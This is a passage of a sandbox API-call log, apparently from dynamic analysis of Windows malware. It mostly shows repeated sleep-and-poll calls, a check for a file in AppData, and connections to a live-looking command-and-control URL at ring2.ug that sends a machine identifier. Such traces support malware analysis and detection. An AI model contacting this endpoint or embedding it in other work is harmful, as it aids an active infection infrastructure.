returned 1 [0203.375] AreFileApisANSI () returned 1 [0203.375] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a6a4e4, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0203.375] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7a) returned 0x679450 [0203.375] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a6a4e4, cbMultiByte=-1, lpWideCharStr=0x679450, cchWideChar=61 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 61 [0203.381] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\bowsakkdestx.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x9a6a368, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0203.416] GetLastError () returned 0x2 [0203.424] GetLastError () returned 0x2 [0203.424] SetLastError (dwErrCode=0x2) [0203.424] GetLastError () returned 0x2 [0203.424] SetLastError (dwErrCode=0x2) [0203.424] GetLastError () returned 0x2 [0203.424] SetLastError (dwErrCode=0x2) [0203.424] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x679450 | out: hHeap=0x620000) returned 1 [0203.424] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0203.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c41e0 [0203.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa6) returned 0x70df58 [0203.441] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c41e0 | out: hHeap=0x620000) returned 1 [0203.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1760 [0203.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x340c3b8 [0203.454] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33c1760, cbMultiByte=-1, lpWideCharStr=0x340c3b8, cchWideChar=1056 | out: lpWideCharStr="490C00C027B159BE46CE14D71389A685") returned 33 [0203.460] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x340d028 [0203.460] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340c3b8 | out: hHeap=0x620000) returned 1 [0203.460] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1760 | out: hHeap=0x620000) returned 1 [0203.460] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c0) returned 0x33da058 [0203.460] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x70df58 | out: hHeap=0x620000) returned 1 [0203.460] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340d028 | out: hHeap=0x620000) returned 1 [0203.460] lstrcpyW (in: lpString1=0x9a6af78, lpString2="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php?pid=490C00C027B159BE46CE14D71389A685" | out: lpString1="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php?pid=490C00C027B159BE46CE14D71389A685") returned="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php?pid=490C00C027B159BE46CE14D71389A685" [0203.461] InternetOpenUrlW (hInternet=0xcc0004, lpszUrl="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php?pid=490C00C027B159BE46CE14D71389A685", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0x0 [0205.880] InternetReadFile (in: hFile=0x0, lpBuffer=0x9a6a778, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x9a6a604 | out: lpBuffer=0x9a6a778, lpdwNumberOfBytesRead=0x9a6a604) returned 0 [0205.880] InternetCloseHandle (hInternet=0x0) returned 0 [0205.881] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0205.902] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33da058 | out: hHeap=0x620000) returned 1 [0205.912] timeGetTime () returned 0x113a29f [0205.912] timeGetTime () returned 0x113a29f [0205.912] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0205.912] Sleep (dwMilliseconds=0x64) [0206.022] timeGetTime () returned 0x113a31c [0206.022] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0206.022] Sleep (dwMilliseconds=0x64) [0206.131] timeGetTime () returned 0x113a389 [0206.131] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0206.131] Sleep (dwMilliseconds=0x64) [0206.240] timeGetTime () returned 0x113a3f6 [0206.240] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0206.240] Sleep (dwMilliseconds=0x64) [0206.349] timeGetTime () returned 0x113a464 [0206.349] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0206.349] Sleep (dwMilliseconds=0x64) [0206.459] timeGetTime () returned 0x113a4d1 [0206.459] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0206.459] Sleep (dwMilliseconds=0x64) [0206.568] timeGetTime () returned 0x113a53e [0206.568] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0206.568] Sleep (dwMilliseconds=0x64) [0206.677] timeGetTime () returned 0x113a5ab [0206.677] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0206.677] Sleep (dwMilliseconds=0x64) [0206.786] timeGetTime () returned 0x113a618 [0206.786] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0206.786] Sleep (dwMilliseconds=0x64) [0206.896] timeGetTime () returned 0x113a686 [0206.896] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0206.896] Sleep (dwMilliseconds=0x64) [0207.004] timeGetTime () returned 0x113a6f3 [0207.004] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0207.005] Sleep (dwMilliseconds=0x64) [0207.114] timeGetTime () returned 0x113a760 [0207.114] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0207.114] Sleep (dwMilliseconds=0x64) [0207.223] timeGetTime () returned 0x113a7cd [0207.223] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0207.223] Sleep (dwMilliseconds=0x64) [0207.332] timeGetTime () returned 0x113a83a [0207.332] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0207.332] Sleep (dwMilliseconds=0x64) [0207.441] timeGetTime () returned 0x113a8a8 [0207.441] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0207.442] Sleep (dwMilliseconds=0x64) [0207.551] timeGetTime () returned 0x113a915 [0207.551] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0207.551] Sleep (dwMilliseconds=0x64) [0207.660] timeGetTime () returned 0x113a982 [0207.660] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0207.660] Sleep (dwMilliseconds=0x64) [0207.769] timeGetTime () returned 0x113a9ef [0207.769] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0207.769] Sleep (dwMilliseconds=0x64) [0207.878] timeGetTime () returned 0x113aa5c [0207.878] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0207.878] Sleep (dwMilliseconds=0x64) [0207.988] timeGetTime () returned 0x113aaca [0207.988] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0207.988] Sleep (dwMilliseconds=0x64) [0208.097] timeGetTime () returned 0x113ab37 [0208.097] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0208.097] Sleep (dwMilliseconds=0x64) [0208.208] timeGetTime () returned 0x113aba4 [0208.208] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0208.208] Sleep (dwMilliseconds=0x64) [0208.332] timeGetTime () returned 0x113ac21 [0208.332] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0208.333] Sleep (dwMilliseconds=0x64) [0208.440] timeGetTime () returned 0x113ac8e [0208.440] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0208.440] Sleep (dwMilliseconds=0x64) [0208.549] timeGetTime () returned 0x113acfb [0208.549] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0208.549] Sleep (dwMilliseconds=0x64) [0208.660] timeGetTime () returned 0x113ad68 [0208.660] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0208.660] Sleep (dwMilliseconds=0x64) [0208.767] timeGetTime () returned 0x113add6 [0208.767] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0208.768] Sleep (dwMilliseconds=0x64) [0208.877] timeGetTime () returned 0x113ae43 [0208.877] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0208.877] Sleep (dwMilliseconds=0x64) [0208.989] timeGetTime () returned 0x113aeb0 [0208.989] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0208.989] Sleep (dwMilliseconds=0x64) [0209.095] timeGetTime () returned 0x113af1d [0209.095] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0209.095] Sleep (dwMilliseconds=0x64) [0209.204] timeGetTime () returned 0x113af8a [0209.204] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0209.204] Sleep (dwMilliseconds=0x64) [0209.314] timeGetTime () returned 0x113aff8 [0209.314] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0209.314] Sleep (dwMilliseconds=0x64) [0209.424] timeGetTime () returned 0x113b065 [0209.424] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0209.424] Sleep (dwMilliseconds=0x64) [0209.532] timeGetTime () returned 0x113b0d2 [0209.532] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0209.532] Sleep (dwMilliseconds=0x64) [0209.643] timeGetTime () returned 0x113b13f [0209.643] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0209.643] Sleep (dwMilliseconds=0x64) [0209.750] timeGetTime () returned 0x113b1ac [0209.750] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0209.750] Sleep (dwMilliseconds=0x64) [0209.860] timeGetTime () returned 0x113b21a [0209.860] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0209.860] Sleep (dwMilliseconds=0x64) [0209.969] timeGetTime () returned 0x113b287 [0209.969] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0209.969] Sleep (dwMilliseconds=0x64) [0210.078] timeGetTime () returned 0x113b2f4 [0210.078] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0210.078] Sleep (dwMilliseconds=0x64) [0210.187] timeGetTime () returned 0x113b361 [0210.187] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0210.187] Sleep (dwMilliseconds=0x64) [0210.296] timeGetTime () returned 0x113b3ce [0210.296] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0210.296] Sleep (dwMilliseconds=0x64) [0210.405] timeGetTime () returned 0x113b43c [0210.406] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0210.406] Sleep (dwMilliseconds=0x64) [0210.515] timeGetTime () returned 0x113b4a9 [0210.515] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0210.515] Sleep (dwMilliseconds=0x64) [0210.624] timeGetTime () returned 0x113b516 [0210.624] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0210.624] Sleep (dwMilliseconds=0x64) [0210.733] timeGetTime () returned 0x113b583 [0210.733] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0210.733] Sleep (dwMilliseconds=0x64) [0210.842] timeGetTime () returned 0x113b5f0 [0210.842] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0210.842] Sleep (dwMilliseconds=0x64) [0210.951] timeGetTime () returned 0x113b65e [0210.962] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x9a6a4e4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0210.962] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="bowsakkdestx.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 1 [0210.994] AreFileApisANSI () returned 1 [0210.994] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a6a4e4, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0210.994] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7a) returned 0x6794d8 [0210.995] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a6a4e4, cbMultiByte=-1, lpWideCharStr=0x6794d8, cchWideChar=61 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 61 [0211.004] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\bowsakkdestx.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x9a6a368, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0211.046] GetLastError () returned 0x2 [0211.046] GetLastError () returned 0x2 [0211.046] SetLastError (dwErrCode=0x2) [0211.046] GetLastError () returned 0x2 [0211.047] SetLastError (dwErrCode=0x2) [0211.047] GetLastError () returned 0x2 [0211.047] SetLastError (dwErrCode=0x2) [0211.055] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6794d8 | out: hHeap=0x620000) returned 1 [0211.056] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0211.056] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c41e0 [0211.066] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa6) returned 0x70df58 [0211.066] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c41e0 | out: hHeap=0x620000) returned 1 [0211.066] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c16f0 [0211.066] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x340c3b8 [0211.066] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33c16f0, cbMultiByte=-1, lpWideCharStr=0x340c3b8, cchWideChar=1056 | out: lpWideCharStr="490C00C027B159BE46CE14D71389A685") returned 33 [0211.066] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x340d028 [0211.066] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340c3b8 | out: hHeap=0x620000) returned 1 [0211.066] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c16f0 | out: hHeap=0x620000) returned 1 [0211.066] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c0) returned 0x692260 [0211.066] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x70df58 | out: hHeap=0x620000) returned 1 [0211.066] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340d028 | out: hHeap=0x620000) returned 1 [0211.066] lstrcpyW (in: lpString1=0x9a6af78, lpString2="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php?pid=490C00C027B159BE46CE14D71389A685" | out: lpString1="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php?pid=490C00C027B159BE46CE14D71389A685") returned="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php?pid=490C00C027B159BE46CE14D71389A685" [0211.067] InternetOpenUrlW (hInternet=0xcc0004, lpszUrl="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php?pid=490C00C027B159BE46CE14D71389A685", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0x0 [0213.401] InternetReadFile (in: hFile=0x0, lpBuffer=0x9a6a778, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x9a6a604 | out: lpBuffer=0x9a6a778, lpdwNumberOfBytesRead=0x9a6a604) returned 0 [0213.401] InternetCloseHandle (hInternet=0x0) returned 0 [0213.401] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0213.401] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x692260 | out: hHeap=0x620000) returned 1 [0213.401] timeGetTime () returned 0x113bfdf [0213.401] timeGetTime () returned 0x113bfdf [0213.401] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0213.401] Sleep (dwMilliseconds=0x64) [0213.510] timeGetTime () returned 0x113c04c [0213.510] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0213.510] Sleep (dwMilliseconds=0x64) [0213.621] timeGetTime () returned 0x113c0ba [0213.621] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0213.621] Sleep (dwMilliseconds=0x64) [0213.728] timeGetTime () returned 0x113c127 [0213.728] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0213.728] Sleep (dwMilliseconds=0x64) [0213.837] timeGetTime () returned 0x113c194 [0213.837] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0213.837] Sleep (dwMilliseconds=0x64) [0213.947] timeGetTime () returned 0x113c201 [0213.947] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0213.947] Sleep (dwMilliseconds=0x64) [0214.056] timeGetTime () returned 0x113c26e [0214.056] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0214.056] Sleep (dwMilliseconds=0x64) [0214.165] timeGetTime () returned 0x113c2dc [0214.165] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0214.165] Sleep (dwMilliseconds=0x64) [0214.274] timeGetTime () returned 0x113c349 [0214.274] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0214.274] Sleep (dwMilliseconds=0x64) [0214.396] timeGetTime () returned 0x113c3b6 [0214.396] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0214.396] Sleep (dwMilliseconds=0x64) [0214.492] timeGetTime () returned 0x113c423 [0214.492] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0214.493] Sleep (dwMilliseconds=0x64) [0214.603] timeGetTime () returned 0x113c490 [0214.603] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0214.603] Sleep (dwMilliseconds=0x64) [0214.711] timeGetTime () returned 0x113c4fe [0214.711] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0214.711] Sleep (dwMilliseconds=0x64) [0214.820] timeGetTime () returned 0x113c56b [0214.820] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0214.820] Sleep (dwMilliseconds=0x64) [0214.929] timeGetTime () returned 0x113c5d8 [0214.929] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0214.929] Sleep (dwMilliseconds=0x64) [0215.039] timeGetTime () returned 0x113c645 [0215.039] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0215.039] Sleep (dwMilliseconds=0x64) [0215.148] timeGetTime () returned 0x113c6b2 [0215.148] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0215.148] Sleep (dwMilliseconds=0x64) [0215.257] timeGetTime () returned 0x113c720 [0215.257] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0215.257] Sleep (dwMilliseconds=0x64) [0215.366] timeGetTime () returned 0x113c78d [0215.366] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0215.366] Sleep (dwMilliseconds=0x64) [0215.475] timeGetTime () returned 0x113c7fa [0215.475] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9a6a5c8) returned 0 [0215.476] Sleep (dwMilliseconds=0x64) [0215.587] timeGetTime () returned 0x113c867 [0215.587] PeekMessageW (in: lpMsg=0x9a6a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 